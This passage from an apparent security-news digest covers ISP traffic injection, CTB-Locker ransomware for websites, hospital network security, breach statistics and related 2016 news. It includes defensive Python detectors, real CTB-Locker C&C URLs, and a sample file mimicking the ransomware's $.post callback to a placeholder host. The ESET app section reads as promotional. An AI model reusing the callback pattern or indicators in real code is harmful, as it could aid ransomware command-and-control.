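    Segment(1,    5,     61, 0.000, b"HTTP/1.1 302 Found\r\nLocation: http://ads.invalid/r\r\n\r\n"),
    Segment(1,    41200, 52, 0.004, b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>"),
    Segment(1461, 41201, 52, 0.016, b"<body>...part 2..."),
    Segment(2921, 41202, 52, 0.028, b"...part 3..."),
    Segment(4381, 41203, 52, 0.040, b"...part 4...</body></html>"),
]

if __name__ == "__main__":
    for v in classify(SAMPLE_FLOW):
        print(f"segments {v['pair']}: forged = #{v['forged']} "
              f"({v['status_line'].decode()}), votes {v['votes']}")
```

Two caveats for anyone running this on real captures: some modern IP stacks randomize or zero the identification field, which weakens the first heuristic (the TTL vote is then the most reliable one), and the timing rule assumes the monitor is close to the client; a capture taken near the server sees the genuine response first.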
List of the Infection Groups
In total, 14 different ISPs were observed injecting content; 10 of them are in China, 2 in Malaysia, and 1 each in India and the United States.
Following are the injection groups and their characteristics:
1. Hao – Redirected users to hao123.com using an HTTP 302 response.
2. GPWA – Requests for the genuine GPWA gambling site were redirected to a look-alike domain, 'qpwa' (many users would not notice the difference between 'q' and 'g').
The forged content here includes a JavaScript that refers to a resource having the same name as the one originally requested by the user, but the forged resource is located at qpwa.org registered to a Romanian citizen.
3. Duba Group – The injections in this group add to the original content of a website a colorful button that prompts the victim to download an executable from a link at the domain duba.net.
The executable is flagged as malicious by several antivirus vendors.
4. Mi-img – In these sessions the client, apparently an Android device, tries to download an application; the injected response points it to a host that a BotScout lookup identified as associated with bot activity.
5. Server Erased – The injected responses were identical to the legitimate ones except that the original value of the HTTP 'Server' header was changed.
Motive Behind the Attack
Both the advertisers and the ISPs benefit from redirecting users' traffic to the advertisers' sites.
The practice increases advertising revenue and other profits for advertisers and ISPs alike.
During their research, the researchers logged massive amounts of Web traffic and detected around 400 injection incidents based on this technique.
Most of these events involved ISPs in China and other Far East countries, even when the traffic originated from Western countries; a German user accessing a website hosted in China is therefore just as susceptible to having his or her traffic injected with ads or malware.
How to Mitigate?
Where the injecting network is the user's own edge ISP, the final provider that connects them to the Internet, users can change provider; but as noted above, injection was also observed in core networks that the user does not choose, so this only partially helps.
The simplest effective remedy is for website operators to serve their sites over HTTPS: every site in which injection was observed was served over plain HTTP.
An on-path injector can forge a plaintext HTTP response, but it cannot forge a response on a TLS connection without the site's private key or a certificate the browser trusts, so injected content is either rejected or triggers a certificate warning.
HTTPS therefore blocks this class of attack, and users are advised to prefer HTTPS sites (and to treat an unexpected redirect on a plain-HTTP page with suspicion).
Delivering illegitimate content, or redirecting users for profit, ultimately erodes public trust in the networks themselves.
CTB-Locker Ransomware Spreading Rapidly, Infects Thousands of Web Servers
27.2.2016 Virus
In the last few years we have seen a steady rise in ransomware threats, from CryptoWall to the Locky ransomware discovered last week.
Now another variant has branched out of the CTB-Locker family, updated to target websites.
The new variant, dubbed "CTB-Locker for Websites", hijacks websites by encrypting their data, which is only decrypted after a payment of 0.4 BTC.
This seems to be the first time a ransomware has actually defaced a website in an attempt to convince its administrator to comply with the ransom demand.
However, as proof that the decryption key works, infected site admins can decrypt two pre-selected files for free.
Here's How CTB-Locker for Websites Ransomware Works
CTB-Locker replaces the site's index page (the original index.php or index.html) with the attacker's own index.php, which serves the defacement page.
The defacement page serves a message informing the site owners that their files have been encrypted, and they need to pay a ransom before a certain deadline.
Once encrypted, the compromised websites display the following message:
"Your scripts, documents, photos, databases and other important files have been encrypted with strongest encryption algorithm AES-256 and unique key, generated for this site."
The message also contains a step-by-step guide that helps the CTB-Locker victims to make the payment to a specific Bitcoin address.
FREE Key to Decrypt Any 2 Random Files
Once in control of the website, the attacker's index.php handles two kinds of AES-256 decryption keys.
The first key decrypts two pre-chosen "test" files for free, to demonstrate that the decryption procedure works.
When the site administrator enters a filename and clicks "Decrypt for Free", a jQuery request sends the key to the C&C server for verification; on success the two files are decrypted and the page displays 'Congratulations! TEST FILES WAS DECRYPTED!!'
The second key decrypts the rest of the seized files once the Bitcoin payment has been made.
All of the website's content is encrypted with AES-256, and a unique ID is generated for each infected website.
Nearly every common file extension is targeted by CTB-Locker for Websites.
Live Session with Ransomware Attackers
Another unusual feature of the ransomware is that victims can exchange messages with the attackers.
The developers built a chat function into the page: the victim can talk to the ransomware creators after specifying the name of the secret file, which is located in the same directory as index.php.
CTB-Locker for Websites → Files It Drops on the Server
The CTB-Locker for Websites package consists of the following files:
index.php : the main component of CTB-Locker for Websites; contains the encryption and decryption routines as well as the payment page.
allenc.txt : a list of all encrypted files.
test.txt : the paths and filenames of the two pre-chosen files that can be decrypted for free.
victims.txt : a list of all files that are to be encrypted. Files that have already been encrypted remain in this list.
extensions.txt : the list of file extensions that should be encrypted.
secret_[site_specific_string] : the secret file used by the Free Decrypt and Chat functions, located in the same folder as index.php.
Command and Control Server Location:
Benkow Wokned (@benkow_), the security researcher who discovered CTB-Locker for Websites, found that index.php uses the jQuery.post() function to POST data to the ransomware's command-and-control (C&C) servers.
Three C&C servers for CTB-Locker for Websites have been identified so far:
http://erdeni.ru/access.php
http://studiogreystar.com/access.php
http://a1hose.com/access.php
The ransomware also gives website administrators a deadline to recover the files; if the payment is not made in time, the ransom doubles to 0.8 BTC.
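Given the file layout and the C&C pattern described above, a site operator can triage a suspect web root quickly. The following is an added example in Python (not code from the researcher or from the ransomware itself): it walks a web root, looks in each directory for the marker files, a secret_* file, the ransom-note text and a jQuery $.post() call to an access.php URL inside index.php, and reports directories whose indicators add up. The sample web root it builds under a temporary directory, and the placeholder C&C host c2.invalid in it, are constructed for the demonstration; the three KNOWN_C2 URLs are the ones listed above.

```python
import os
import re
import tempfile
from typing import Dict, List

# Artefacts named in the write-up above.
MARKER_FILES = {"allenc.txt", "test.txt", "victims.txt", "extensions.txt"}
SECRET_FILE_RE = re.compile(r"^secret_[A-Za-z0-9_]+$")
# The three C&C endpoints reported for this campaign (from the list above).
KNOWN_C2 = {
    "http://erdeni.ru/access.php",
    "http://studiogreystar.com/access.php",
    "http://a1hose.com/access.php",
}
# index.php talks to the C&C with jQuery: $.post('<host>/access.php', ...)
JQUERY_POST_RE = re.compile(r"""\$\.post\(\s*['"](https?://[^'"]+/access\.php)['"]""")
NOTE_RE = re.compile(r"have been encrypted with strongest encryption algorithm AES-256", re.I)


def scan_dir(path: str) -> Dict[str, object]:
    """Collect CTB-Locker-for-Websites indicators found directly in one directory."""
    names = set(os.listdir(path))
    findings: Dict[str, object] = {
        "dir": path,
        "markers": sorted(names & MARKER_FILES),
        "secret_files": sorted(n for n in names if SECRET_FILE_RE.match(n)),
        "c2_urls": [],
        "known_c2": [],
        "ransom_note": False,
    }
    index = os.path.join(path, "index.php")
    if os.path.isfile(index):
        with open(index, "r", errors="replace") as fh:
            src = fh.read()
        findings["c2_urls"] = JQUERY_POST_RE.findall(src)
        findings["known_c2"] = [u for u in findings["c2_urls"] if u in KNOWN_C2]
        findings["ransom_note"] = bool(NOTE_RE.search(src))
    # One point per independent indicator; a clean site scores 0.
    findings["score"] = (len(findings["markers"]) + len(findings["secret_files"])
                         + len(findings["c2_urls"]) + int(findings["ransom_note"]))
    return findings


def scan_webroot(root: str, min_score: int = 2) -> List[Dict[str, object]]:
    """Walk the web root and return every directory whose indicators reach min_score."""
    hits = []
    for dirpath, _dirs, _files in os.walk(root):
        f = scan_dir(dirpath)
        if f["score"] >= min_score:
            hits.append(f)
    return hits


def make_sample_webroot() -> str:
    """Constructed sample: one clean site next to one infected directory laid out
    as the write-up describes (c2.invalid is a placeholder, not a real server)."""
    root = tempfile.mkdtemp(prefix="ctb_demo_")
    clean = os.path.join(root, "blog")
    os.makedirs(clean)
    with open(os.path.join(clean, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>")
    bad = os.path.join(root, "shop")
    os.makedirs(bad)
    with open(os.path.join(bad, "index.php"), "w") as fh:
        fh.write("<p>Your scripts, documents, photos, databases and other important files "
                 "have been encrypted with strongest encryption algorithm AES-256</p>\n"
                 "<script>$.post('http://c2.invalid/access.php', {id: uid});</script>\n")
    for name in ("allenc.txt", "victims.txt", "extensions.txt", "secret_7a1f"):
        open(os.path.join(bad, name), "w").close()
    return root


if __name__ == "__main__":
    for hit in scan_webroot(make_sample_webroot()):
        print(f"{hit['dir']}: score {hit['score']}, markers {hit['markers']}, "
              f"c2 {hit['c2_urls']}, known C&C {hit['known_c2']}")
```

A hit with a score of 2 or more is worth a manual look; a matching URL in known_c2 is a direct match against the campaign's reported infrastructure. Any C&C URL found that is not in KNOWN_C2 is a new indicator to block and report, not a false positive.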
CTB-Locker for Windows
CTB-Locker for Websites isn't the only recent development in this family of ransomware. The ransomware has also appeared in a Windows variant whose executables are code-signed with a stolen certificate.
The purpose of a digital signature is to assure users of the authenticity of a product; code-signing certificates are issued only after a background check by Certificate Authorities (CAs) such as Verizon or DigiCert.
But the cybercriminal group behind CTB-Locker has subverted that trust: the Windows executable of the ransomware ships with a valid-looking digital signature.
Uses Encryptor RaaS for the Code-Signing Certificate
The group behind CTB-Locker is believed to have used the service of Jeiphoos, another ransomware developer whose "Encryptor RaaS" Tor site lets anyone sign an executable with a stolen code-signing certificate for free.
Stealing code-signing certificates is not new; it has featured in malware campaigns for years.
Hijacking a company website directly disrupts the services offered to users through it, and the impact rises further if the threat hits an e-commerce site, where payment (point-of-sale) functions are affected.
Many websites have already been compromised by CTB-Locker for Websites; according to the analysis, many of the targets are WordPress sites (mostly static pages).
Because the ransomware runs on the compromised web server rather than arriving through Office macros like Locky, recovery is comparatively straightforward: the administrator can restore the site from a clean backup, after identifying and closing whatever gave the attacker write access to the web root, since otherwise the site will simply be encrypted again.
Securing Hospitals from hackers that can put lives in dangers
27.2.2016 Hacking
Securing Hospitals is a report issued by Independent Security Evaluators that demonstrates how hackers can hack hospitals putting lives in danger.
A group of experts from the Independent Security Evaluators research team tested the security of hospital networks, demonstrating that it is possible to gain access to critical medical equipment in attacks they say could put lives in danger.
The study was led by healthcare head Geoff Gentry; the results are presented in an interesting paper titled “Securing Hospitals.”
The experts demonstrated that such attacks could put lives in danger: for example, hacking patient monitors makes it possible to display false information, which could result in medical responses that injure or kill patients.
The researchers examined 12 healthcare facilities, two data centres, two web applications, and two live medical devices that could be hacked remotely by threat actors.
“The research results from our assessment of 12 healthcare facilities, 2 healthcare data facilities, 2 active medical devices from one manufacturer, and 2 web applications [show] that remote adversaries can easily deploy attacks that target and compromise patient health. We demonstrated that a variety of deadly remote attacks were possible within these facilities, of which four attack scenarios are presented in this report.” states the report.
The 71-page document is one of the most interesting studies of the security level of hospitals and of the resilience of medical devices to cyber attacks.
The report details a typical attack scenario in which a foreign group launches a cyber attack against the patients of a medical facility by exploiting vulnerabilities in passive medical devices.
The experts targeted an externally facing web server, exploiting its vulnerabilities to gain control of the machine; once inside the network, they moved laterally, searching for vulnerable devices to compromise.
“On a disconnected network segment, our team demonstrated an authentication bypass attack to gain access to the patient monitor in question, and instructed it to perform a variety of disruptive tasks, such as sounding false alarms, displaying incorrect patient vitals, and disabling the alarm,” the team says in the paper.
“This attack would have been possible against all medical devices … likely preventing assistance and resulting in the death or serious injury of patients.”
“The attack scenario is harrowing: Diligently executed, many human lives could be at stake, and extrapolating this problem to other hospitals is even more worrisome.”
Patient data could also be stolen easily; for example, attackers can exploit a cross-site scripting flaw in a web application.
The experts dedicated a specific session of their test to attacks relying on USB drives used as bait. In one test the researchers dropped 18 infected sticks around hospitals; the malware on the sticks allowed them to harvest information from terminals and establish a backdoor inside the systems.
In one case the researchers gained access to the hospital’s drug dispensary.
“At the time of this reporting, we are working to demonstrate that an attack against the particular dispensary is possible, meaning that anyone who can connect to the dispensary can then get access to the configuration interface and manipulate what the device believes it has to be its inventory. If this medication were then given to a patient, it would likely harm or kill the patient.” states the report.
The researchers also paid close attention to physical security, noting exposed hardware ports and unattended, logged-in computers in patient rooms, which are easy to abuse.
“The findings show an industry in turmoil: lack of executive support; insufficient talent; improper implementations of technology; outdated understanding of adversaries; lack of leadership, and a misguided reliance upon compliance,” states the report.
“[It] illustrates our greatest fear: patient health remains extremely vulnerable. One overarching finding of our research is that the industry focuses almost exclusively on the protection of patient health records, and rarely addresses threats to or the protection of patient health from a cyber threat perspective.”
The experts concluded that hospital networks are often insecure; in many cases the organizations lack security policies and never audit their systems, exposing patients to the risk of cyber attacks.
“We found egregious business shortcomings in every hospital, including insufficient funding, insufficient staffing, insufficient training, lack of policy, lack of network awareness, and many more,” researcher Ted Harrington says. “These vulnerabilities are a result of systemic business failures.”
The findings demonstrate that patient health remains extremely vulnerable to cyber attack.
Gemalto Breach Level Index report 2015, what are hackers looking for?
27.2.2016 Hacking
2015 Gemalto Breach Level Index report confirmed the increased interest of threat actors in Government and healthcare data.
According to security firm Gemalto, government and healthcare have overtaken retail as the most-targeted sectors for data breaches.
A total of 1,673 data breaches led to 707 million data records being compromised worldwide during 2015, according to the latest edition of the Gemalto Breach Level Index report.
Not all breaches are equally serious, and the number of records exposed is only one metric. The Breach Level Index tries to account for this by assigning a severity score to each breach based on factors including the type of data and the number of records compromised, the source of the breach, and whether the data was encrypted. The methodology aims to separate nuisances from high-impact mega breaches.
More than 3.6 billion data records have been exposed since 2013, when Gemalto began benchmarking publicly disclosed breaches. In 2015, malicious outsiders (i.e. hackers) were the leading source of breaches, accounting for 964 incidents, or 58 percent of breaches and 38 percent of compromised records. Accidental loss or exposure of data accounted for 36 percent of all records.
According to the Breach Level Index report, state-sponsored attacks accounted for only 2 percent of the reported incidents, yet the records compromised in those attacks made up 15 percent of all records exposed.
The disproportionate impact of a small number of breaches is partly explained by the high-impact breach at the United States Office of Personnel Management (OPM), which exposed the personal details of government employees and leaked all manner of sensitive data from background checks and related documents. Malicious insiders accounted for 14 percent of breaches and only 7 percent of compromised records.
Geographically, 59 percent of reported breach incidents occurred in the United States. Europe accounted for 12 percent of incidents, followed by the Asia-Pacific region at 8 percent.
Identity theft remained the primary type of breach, accounting for 53 percent of breaches and 40 percent of all compromised records.
The government sector accounted for 43 percent of compromised records, a five-fold increase over 2014 due to several large breaches in the United States and Turkey, and 16 percent of all breaches. Healthcare accounted for 19 percent of compromised records and 23 percent of all breaches.
By contrast, retail saw the number of stolen records drop 93 percent year-on-year, so it accounted for only 6 percent of stolen records and 10 percent of the total number of breaches in 2015.
This is in large part because 2014 was a particularly bad year for retail breaches, with incidents at Home Depot and others skewing the numbers upwards. The financial services sector likewise saw a nearly 99 percent drop, representing only 0.1 percent of compromised records and 15 percent of the total number of breaches.
They are not trying to crack your bank account, and that is bad news for you
Over the last year or so, criminal hackers have shifted their focus away from conventional card fraud and towards stealing personal information to facilitate identity theft. This change is bad news for consumers and organizations alike, according to Gemalto.
Jason Hart, Vice President and Chief Technology Officer for Data Protection at Gemalto, said:
“In 2014, consumers may have been concerned about having their credit card numbers stolen, but there are built-in protections to limit the financial risks” . “However, in 2015 criminals shifted to attacks on personal information and identity theft, which are much harder to remediate once they are stolen.”
As organizations and devices collect ever-increasing amounts of customer data, and as consumers’ online activities become more diverse and prolific, more information about what they do, who they are and what they like is at risk of being stolen from the organizations that store it.
He added, “If consumers’ entire personal data and identities are being co-opted again and again by cyber thieves, trust will increasingly become the centerpiece in the calculus of which companies they do business with”.
Ransomware attacks paralyzed at least two German hospitals
27.2.2016 Virus
New ransomware infections hit hospitals in Germany, at least two of them were infected by the dreaded malware.
According to local reports, the systems at two German hospitals were infected by ransomware, similar to what recently happened at the Hollywood Presbyterian Medical Center in the US.
According to the German broadcaster Deutsche Welle, the German hospitals infected by the ransomware are the Lukas Hospital in the city of Neuss and the Klinikum Arnsberg hospital in North Rhine-Westphalia.
“Several hospitals in Germany have come under attack by ransomware, a type of virus that locks files and demands cash to free data it maliciously encrypted. It will take weeks until all systems are up and running again.” reported the broadcaster.
A few weeks ago, the staff at the Lukas Hospital noticed a progressive deterioration of system performance, while error messages were popping up.
“We then pulled the plug on everything,” spokesperson Dr. Andreas Kremer told DW. “Computers, servers, even the email server, and we went offline.”
The ransomware paralyzed the hospital’s IT infrastructure; the incident occurred on February 10, 2016. The internal IT staff expect it will take weeks until everything is back to normal.
“Our IT department quickly realized that we caught malware that encrypts data. So if the X-ray system wants to access system data, it failed to find it because it’s been encrypted, so it displays an error message,” Kremer said.
The hospital staff used phone and fax to communicate with patients, and explained that a number of high-risk surgeries were postponed because of the attack.
The hospital reported the incident to the authorities and to the State Criminal Investigation Office (LKA), which is investigating the case.
“We haven’t received a concrete demand for money, but we’ve seen these pop up windows that appear if you don’t stop the ransomware on a computer,” he told DW. The message in broken English points to an anonymous email address to get in touch with. “Following the Criminal Police Office’s advice, we didn’t do that,” Kremer said.
Fortunately, the hospital’s IT staff make regular backups of the data.
“We have regular backups, so that isn’t a problem. If the virus encrypted data we have backed up, we just restore the backup files,” Kremer said.
The incident at Klinikum Arnsberg occurred a couple of days later; here too the systems were infected by ransomware that arrived through a phishing email.
In this case only one of the hospital’s 200 servers was infected, and the IT staff resolved the situation by restoring a working backup.
“According to present knowledge, it was an attachment in an email that allowed the virus to enter the system,” Klinikum Arnsberg spokesperson Richard Bornkeßel told DW. “Fortunately, it was only one server that was affected. The virus had started to encrypt files, but we could simply restore them from a backup,”
Neither German hospital paid the ransom.
Windows 10 Started Showing Ads on LockScreen — Here's How to Turn It OFF
26.2.2016 OS
If you upgraded an older version of Windows to the new Windows 10, you may have noticed an advertisement on your desktop or laptop’s lock screen over the past couple of days.
Yes, this is how Microsoft has chosen to generate revenue after offering Windows 10 as a free download: monetize the lock screen.
Windows 10's Spotlight feature, which usually shows clean, beautiful photographs and fun facts on the lock screen, has now started displaying advertisements to the more than 200 million devices running Windows 10.
Some Windows 10 users have reported seeing ads for Rise of the Tomb Raider with links to Windows Store from where users can purchase the video game. Microsoft started selling the game last month.
Although the ads are not as annoying as the Windows 10 privacy concerns related to the way Microsoft collects your personal data, the good news is that you can turn the ads OFF.
Must Read: How to Stop Windows 7 or 8 from Downloading Windows 10 Automatically.
Here's How to Turn the Ads OFF
Disable Windows 10 Lock Screen Advertisement
The advertisements come from the Windows Spotlight feature in your Personalization settings.
If you don't want to see these intrusive ads, follow the steps given below to disable Windows Spotlight:
Open the Start Menu and look for 'Lock Screen Settings.'
Under 'Background,' choose either 'Picture' or 'Slideshow' instead of Windows Spotlight.
Now scroll down to 'Get fun facts, tips, tricks, and more on your lock screen' and uncheck this box.
The advertisements are turned ON for your lock screen by default, which is a clever way to let companies reach their customers without ever mentioning the word 'advertisements' to Windows users.
Also Read: If You Haven't yet, Turn Off Windows 10 Keylogger Now.
As I previously said: Nothing comes for Free, as "Free" is just a relative term. Everything comes with its own price.
As warned last year, Microsoft has also started pushing Windows 10 upgrades onto its users' computers much harder by re-categorizing Windows 10 as a "Recommended Update" in Windows Update instead of an "optional update."
How To Keep Your Android Phone Secure
26.2.2016 Android
With the number of threats on the rise, the Android platform is no longer safe, which is no surprise to anyone.
Most of us are usually more worried about the security of our desktops or laptops and forget about the consequences if our smartphones are compromised or stolen.
Unlike desktops, your smartphones and tablets carry all sorts of information, from your personal photographs, important emails and messages to your sensitive financial details. And due to the rise in mobile usage, hackers have shifted their interest from desktops to the mobile platform.
Nowadays, nearly all the threats that previously targeted the desktop platform are targeting smartphone users.
Ransomware, phishing, spam, spyware, botnets, banking malware, OS and software vulnerabilities, just to name a few examples; yet users don't understand the potential threat when it comes to mobile devices.
Additionally, your smartphones and tablets are also subject to further threats, such as smartphone theft and unnecessary app permissions that allow even legitimate and reputable companies to spy on you.
There are a number of solutions to all the above issues, but for that you generally need to install multiple cumbersome and untrusted applications on your mobile device.
For example, a good antivirus to resolve malware and virus issues, an app to manage Android app permissions, a device tracking application in case your device is lost or stolen, and lots more; installing all these apps consumes a lot of space, RAM and battery on your device.
I frequently receive these types of queries from my readers who ask me for some good solution that could solve most of the security and privacy issues in one go.
So I headed to the Google Play Store and started searching for an app that offers a full suite of security and privacy tools. I came across some reputable apps that resolve only a few issues, and some apps that address several issues but come from a vendor I can't trust.
Then I came across an app from one of the reputable antivirus vendors that offers protection against all the threats discussed above.
Anti-Virus Feature with 99.9% Detection Rate
As its primary role, ESET offers the best antivirus scanning for your smartphone, with an up-to-date threat database and a clean mobile app interface.
According to the latest test and review conducted by AV-TEST, an independent lab, ESET Mobile Security antivirus detects 99.9% of the latest threats, with a protection and usability score of 6 out of 6.
After installing and registering my account, the app's Anti-Virus feature offered me options to have my smartphone scanned periodically:
At specific times, when I’m not using my phone, or
When I plug in my smartphone to charge
Moving further, I found 3 different levels of scanning available in the software: Quick Scan, Smart Scan, and Deep Scan. So one can choose whichever option one feels is suitable. I chose Deep Scan, which scanned every file available on my phone.
ESET Mobile Security also makes scan logs easy to access, and one can also have a look at the quarantined items (suspicious files or malware) detected by the antivirus.
Moreover, the antivirus feature also offers a series of advanced options, including support for ESET Live Grid, detection of potentially unwanted or harmful applications, and real-time protection.
Anti-Theft (Remote Lock / Remote Wipe / Locate)
It is always unfortunate when our expensive mobile device is lost or stolen. Many apps on the market offer a device recovery feature via GPS-based tracking, but many times these apps are unable to locate the device. And if a thief somehow gets access to the device, it is easy for them to uninstall the tracking app.
But I liked the way ESET's Anti-Theft feature works. It is designed to help you easily track your lost or stolen device, and it password-protects the app so that no one but you can uninstall it.
All you need to do is:
Set a trusted SIM card within the app.
Provide a trusted number in case of emergency
If your device is lost or stolen, you can log into your ESET account at my.eset.com and track your devices through an easy-to-use web interface, ensuring that all your data remains protected from unauthorized users.
As soon as you mark your device as 'Missing' on the online portal, the location of your stolen or lost device will be displayed on a real-time map so that you can easily trace it. You can even view a list of IP addresses that your lost device was connected to.
Bonus, 'Selfies' of Phone Thieves: devices marked as Missing will automatically capture photographs with their front and back cameras and send them to the online portal, which makes it easier to locate a missing device.
But, What if your stolen device is not connected to the Internet?
Here's How you can Protect Your Smartphone:
Like other apps, ESET Anti-Theft feature lets you send an SMS message command from a trusted number to remotely lock or erase your smartphone data immediately, as well as ringing it in case it has been lost somewhere nearby.
On top of that, ESET Anti-Theft provides a series of additional features; for example, even if an unauthorized SIM card has been inserted into your stolen smartphone, you can still send remote commands to it.
Even if someone enters a wrong PIN or pattern on your smartphone, or inserts an unauthorized SIM, your device will be able to take preventive actions on its own in an effort to ensure that your data remains protected.
Device Monitoring and Application Audit:
These features are something that most of us ignore while searching for a good mobile security solution.
Today many apps, even legitimate ones, request unnecessary permissions. Some of your apps can make phone calls, track your location, read your browsing history, contacts, SMS, photos and calendar, and even share this data with third-party advertising companies without your knowledge.
And since I'm security conscious, I always check which app is requesting what permissions, and for this I found ESET Mobile Security the best fit for me.
ESET Mobile Security offers an 'Application Audit' feature to help you know what permissions the various apps installed on your smartphone or tablet have.
You can tap any app listed in the Application Audit interface, which takes you to your smartphone's settings menu, from where you can easily restrict unnecessary app permissions or even uninstall the app.
Besides this, the app offers a 'Device Monitoring' feature that informs you of any important settings you haven't configured correctly and that could compromise your security.
Anti-Phishing and SMS/MMS/Call Blocker
Phishing emails, messages and even contacts are common these days. Attackers can trick you into handing over access to sensitive accounts such as banking, email or social media.
So it has become important for us to keep an eye on every email and message we receive each day, but that is not as easy as it sounds.
This app resolves that hurdle as well. ESET's Anti-Phishing feature offers an additional level of protection when you browse the web from your smartphone or tablet.
Though the app doesn't support all browsers currently, you can choose one from the list of supported browsers to navigate the web.
Besides all the above tools, ESET Mobile Security also offers SMS, MMS and phone call blocking for Android users.
So you can easily opt to block calls and messages from all unknown numbers or, more interestingly, from all or specific known numbers, with options for both incoming and outgoing blocks.
In short, I found ESET Mobile Security a package of security and privacy tools bundled into a single app.
The app is fast, provides a user-friendly interface, keeps you safe from malware, protects against phishing attacks, with numerous other tools to keep your smartphone safe even when it's out of your hands.
However, the ESET Mobile Security app doesn't provide encrypted cloud-based backups or device encryption, which I would like to see built in in the future.
Overall, ESET Mobile Security for Android is a solid choice for protecting your smartphone or tablet, with its top-notch malware protection and huge array of anti-theft and privacy-protection features.
You can download and install the app for FREE, for a lifetime, from the Google Play Store if you are seeking basic protection capabilities.
However, those seeking advanced security and privacy protection on their smartphones should upgrade to a premium subscription via in-app purchase.
Apple hires developer of World's Most Secure Messaging App
26.2.2016 Apple
Apple is serious this time about enhancing iPhone security to the point that even it cannot hack the device. To achieve this, the company has hired one of the key developers of Signal, the world's most secure, open source, encrypted messaging app.
Frederic Jacobs, who worked to develop Signal, announced today that he is joining Apple this summer to work as an intern in its CoreOS security team.
"I'm delighted to announce that I accepted an offer to be working with the CoreOS security team at Apple this summer," Jacobs tweeted Thursday.
Signal app is widely popular among the high-profile privacy advocates, security researchers, journalists and whistleblowers for its clean and open source code, and even the NSA whistleblower Edward Snowden uses it every day.
Signal messages are end-to-end encrypted, which means only the sender and the intended recipient can read the messages. Although Apple's iMessage is also end-to-end encrypted, it is not open source.
Apple to build 'Unhackable' Services
The reason behind Apple's hiring is quite clear, as the company is currently fighting a US court order asking Apple to help the FBI unlock the iPhone 5C of San Bernardino shooter Syed Farook.
Basically, Apple is being forced to create a special, backdoored version of iOS so that the Federal Bureau of Investigation (FBI) can brute force the passcode on Farook's iPhone without losing the data stored on it.
However, Apple CEO Tim Cook has already refused to provide such a backdoor into the iPhone, as it would degrade the privacy and security of all iPhone users.
If it complied with the court order, the company would be flooded with FBI and CIA requests to unlock more iPhones of criminals in the near future, and the recent request by the United States government to unlock 12 more iPhones would be just a starter.
But in an effort to eliminate any chance for government and intelligence agencies to demand backdoors, the company is removing its own ability to create them, and for this it is hiring new interns in its core security team.
Apple found Jacobs a good fit for this, as he had spent two and a half years with Open Whisper Systems, the company behind Signal, before leaving the company earlier this year.
Apple to Fully Encrypt iCloud Backups
In San Bernardino shooter's case, Apple admitted that it helped the FBI in every possible way by providing iCloud Backup of Farook, but now…
Apple is working on encrypting iCloud backups so that only the account owner has access, eliminating any way for the government or hackers to expose its users' data.
While creating iCloud backups of users' photos, videos, app data, iMessage, voicemails, SMS, and MMS messages, Apple stores a copy of its users' decryption keys itself that could be provided to authorities when presented with a valid warrant.
But citing anonymous sources, the Financial Times reports that Apple will no longer keep a copy of the user's decryption key, and encrypted iCloud backups would only be unlocked by the account holder using his or her passcode.
Discover how many ways there were to hack your Apple TV
26.2.2016 Apple
Apple has patched more than 60 vulnerabilities affecting the Apple TV, including flaws that can lead to arbitrary code execution and information disclosure.
IoT devices are enlarging our attack surface, we are surrounded by devices that manage a huge quantity of information and that could be abused by hackers.
Apple has patched more than 60 vulnerabilities affecting the Apple TV, including flaws that can lead to arbitrary code execution, information disclosure, application crashes, and modifications to protected parts of the filesystem.
This new release, Apple TV version 7.2.1, comes 10 months after the last update, issued in April 2015. The new version fixes a number of security vulnerabilities in several components of the Apple TV. The company has patched 33 issues, collectively referenced in 58 CVEs; among them, Apple fixed 19 code execution holes that could be exploited with crafted web content.
The changes will be applied automatically for users who have enabled automatic updates.
The experts at Apple solved serious security issues residing in WebKit, the kernel, the third-party app sandbox, Office Viewer, IOKit, ImageIO, FontParser, DiskImages, bootp, CloudKit, and other libraries.
A close look at the list of security holes reveals the presence of a memory corruption flaw (CVE-2015-5776) that could be exploited by a remote attacker to gain arbitrary code execution or crash applications. Other security vulnerabilities could be triggered by attackers using malicious or malformed DMG files, plists, and apps.
The new release includes a series of fixes that Apple has released over time for other products; the company is spending significant effort on designing a new generation of devices with improved security that meet strict requirements in terms of security.
Recently the company refused to hack into the San Bernardino shooter’s iPhone, and while the dispute with the FBI is going on, it has been reported that Apple is working on a new model that will be impossible to hack.
Wikileaks – NSA tapped world leaders for US geopolitical Interests
26.2.2016 BigBrothers
The NSA tapped world leaders for US Geopolitical Interests, including a conversation between Netanyahu-Berlusconi over the U.S.-Israel Relations.
A couple of days ago the non-profit journalistic organisation WikiLeaks published a collection of highly classified documents revealing that the NSA targeted world leaders for US geopolitical interests.
Some of the intercepts are classified TOP-SECRET COMINT-GAMMA; these are the most highly classified documents ever published by a media organization.
In particular, one of the documents reports eavesdropping conducted by US intelligence on the communications between German Chancellor Angela Merkel and UN Secretary-General Ban Ki-moon regarding climate change negotiations.
The agents of the National Security Agency have bugged a private climate change strategy meeting between the two politicians held in Berlin.
In June 2015, WikiLeaks released another collection of documents on the extensive economic espionage conducted by the NSA in Germany. The spies were particularly interested in the Greek debt crisis. US intelligence targeted German government representatives because of their privileged position in the negotiations between Greece and the EU.
Julian Assange, editor-in-chief at Wikileaks, released the following declaration on Wednesday:
“[it] further demonstrates that the United States’ economic espionage campaign extends to Germany and to key European institutions and issues such as the European Central Bank and the crisis in Greece.” “Would France and Germany have proceeded with the BRICS bailout plan for Greece if this intelligence was not collected and passed to the United States – who must have been horrified at the geopolitical implications?”
The new batch of classified documents also revealed espionage against the Chief of Staff of the UN High Commissioner for Refugees (UNHCR), an activity conducted by US intelligence for a long time by targeting his Swiss phone.
Also under the control of US intelligence was the Director of the Rules Division of the World Trade Organisation (WTO), Johann Human, but the most interesting cables for the Italian Government relate to the espionage against Prime Minister Silvio Berlusconi.
The interceptions were conducted by the Special Collection Service (SCS), a team of cyber spies operating under diplomatic cover in US embassies and consulates around the world. “Back in 2013, thanks to a Snowden document dated 2010, l’Espresso and la Repubblica revealed how Italy was the only European country, along with Germany, to have two Scs teams on its territory: one in Rome and the other in Milan. ” reported an article published by the Italian L’Espresso.
The documents leaked by WikiLeaks confirm that in March 2010 the US Government intercepted communications between the Italian Prime Minister and Israeli PM Netanyahu; the information disclosed reveals that Berlusconi promised to assist Israel in mending its damaged relationship with the U.S.
The crisis between the United States and Israel was triggered by the announcement of Netanyahu's plans to build 1,600 houses in East Jerusalem. Berlusconi offered his support to Israel in helping mend the situation.
